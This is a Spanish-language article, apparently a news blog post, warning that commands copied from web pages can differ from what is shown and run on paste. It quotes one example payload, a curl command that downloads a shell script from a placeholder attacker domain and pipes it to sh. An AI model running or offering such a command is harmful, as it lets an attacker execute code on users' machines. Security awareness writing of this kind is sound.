Es cierto que vivimos en una era en la que la velocidad lo es todo y lo único que importa es obtener resultados rápidos. Sin embargo, pocas personas se detienen por un segundo y piensan en las consecuencias.
Todos los días, millones de programadores, administradores e investigadores de seguridad realizan tareas simples como copiar y pegar comandos de páginas web directamente en la consola de sus PC.
Aunque muchos ni siquiera lo piensan, las consecuencias son mucho más graves y peligrosas de lo que podría pensar en un principio, especialmente si almacena datos sensibles o valiosos.
Un conocido experto en seguridad se tomó el tiempo de compartir lo que realmente sucede si copia y pega contenido de páginas web.
Copiar + Pegar es una forma fácil de conseguir un truco
Gabriel Friedlander, fundador de la plataforma de educación en seguridad Wizer, ha quitado la tapa de un diagrama que lo hará pensar dos veces antes de copiar y pegar comandos de páginas web.
Copiar y pegar contenido de Internet se ha vuelto tan común en estos días que nadie ni siquiera piensa en ello.
Sin embargo, Friedlander advierte que algunas páginas web son más engañosas de lo que parecen a primera vista, y lo que cree que copió es muy diferente de lo que realmente hizo.
Y lo peor de todo, sin el conocimiento o la guía necesarios, las víctimas solo se dan cuenta de su error después de insertar el texto, momento en el que puede ser demasiado tarde.
El analista de seguridad también diseñó un pequeño cuestionario para los lectores de su blog para que la gente realmente pueda entender con qué facilidad se muestra reacio a abrir la puerta a los ciberdelincuentes.
Proporcionó un comando para ser copiado, pero la verdad pertinente solo se revela cuando pega el texto y ve lo que realmente ingresó en su configuración.
Después de copiar el comando que se muestra en la captura de pantalla anterior, el resultado del pegado lo sorprenderá, ya que está lejos de lo que pensaba que estaba duplicando.
curl http://attacker-domain:8000/shell.sh | shAparte de un comando completamente diferente presente en su portapapeles, el carácter de nueva línea (o retorno) al final significa que el ejemplo anterior se ejecutará tan pronto como se inserte directamente en la terminal de Linux.
Por lo tanto, es mejor que esté al tanto de lo que realmente está sucediendo y lo trate como una seria amenaza a la seguridad. No estamos diciendo que todos los sitios web oculten contenido malicioso, pero debes tenerlo en cuenta.
¿Alguna vez ha sido pirateado insertando comandos complicados en su terminal? Comparta su experiencia con nosotros en la sección de comentarios a continuación.
Deja una respuesta